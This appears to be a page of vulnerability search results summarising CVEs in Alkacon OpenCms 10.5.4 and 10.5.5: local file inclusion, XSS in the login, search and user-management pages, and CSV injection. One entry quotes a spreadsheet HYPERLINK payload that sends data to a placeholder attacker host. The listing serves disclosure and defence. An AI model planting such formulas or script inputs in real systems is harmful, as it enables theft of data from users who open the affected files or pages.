468 matches found
CVE-2019-13237
In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, groupnew.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp...
CVE-2019-13237
CVE-2019-13237 affects Alkacon OpenCms 10.5.4 and 10.5.5, where Local File Inclusion allows access to server resources via multiple JSP endpoints (e.g., loginmessage.jsp, xmlcontentrepair.jsp, history/index.jsp, and others). The root cause is improper access control in resources such as clearhist...
CVE-2019-13236
In system/workplace/ in Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple Reflected and Stored XSS issues in the management interface...
CVE-2019-13236
Alkacon OpenCms 10.5.4 and 10.5.5 are affected by multiple Reflected and Stored XSS vulnerabilities in the system/workplace/ management interface. Root cause is not explicitly detailed beyond XSS in the provided documents. The issues could allow execution of arbitrary scripts in authenticated use...
CVE-2019-13235
In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the Login form...
CVE-2019-13235
CVE-2019-13235 affects Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, with a Cross-Site Scripting (XSS) flaw in the login form. Public sources describe the vulnerability as an XSS in the login workflow, with PoCs showing injection potentially via headers like X-Forwarded-For. NVD metrics list...
CVE-2019-13234
In the Alkacon OpenCms Apollo Template 10.5.4 and 10.5.5, there is XSS in the search engine...
CVE-2019-13234
CVE-2019-13234 involves XSS in the Alkacon OpenCms Apollo Template, specifically in the search engine for OpenCms Apollo Template 10.5.4 and 10.5.5. The connected documents confirm a reflected XSS vulnerability in the search endpoint (e.g., parameter q) and also show a related XSS condition in a ...
OpenCMS 10.5.4 Cross Site Scripting
Description: OpenCMS v10.5.4 and before is vulnerable to cross-site scripting in the New User module for the parameters First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used in PoC is...
OpenCMS 10.5.4 CSV Injection
Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in the New User module for the parameters First Name and Last Name. Impacted URL is http://yourwebserverip/opencms/system/workplace/admin/accounts/usernew.jsp. Payload used is '=HYPERLINK"http://attackerip:port/GiveMeSomeData","IAmSafe"'...
CVE-2019-11819
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
Cross site scripting
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
CVE-2019-11818
Alkacon OpenCMS v10.5.4 and before is affected by stored cross site scripting XSS in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp. This allows an attacker to insert arbitrary JavaScript as user input First Name or Last Name, which will be executed whenever the affected...
Code injection
Alkacon OpenCMS v10.5.4 and before is affected by CSV aka Excel Macro Injection in the module New User /opencms/system/workplace/admin/accounts/usernew.jsp via the First Name or Last Name...
CVE-2019-11819
CVE-2019-11819 affects Alkacon OpenCMS v10.5.4 and earlier. The vulnerability is a CSV (Excel Macro) Injection in the New User module (path: /opencms/system/workplace/admin/accounts/user_new.jsp) triggered via the First Name or Last Name fields. The connected documents confirm the same issue acro...
CVE-2019-11818
CVE-2019-11818 affects Alkacon OpenCMS v10.5.4 and earlier. The stored XSS vulnerability resides in the New User module (opencms/system/workplace/admin/accounts/user_new.jsp), allowing attackers to inject arbitrary JavaScript via First Name or Last Name fields; the payload is executed when the af...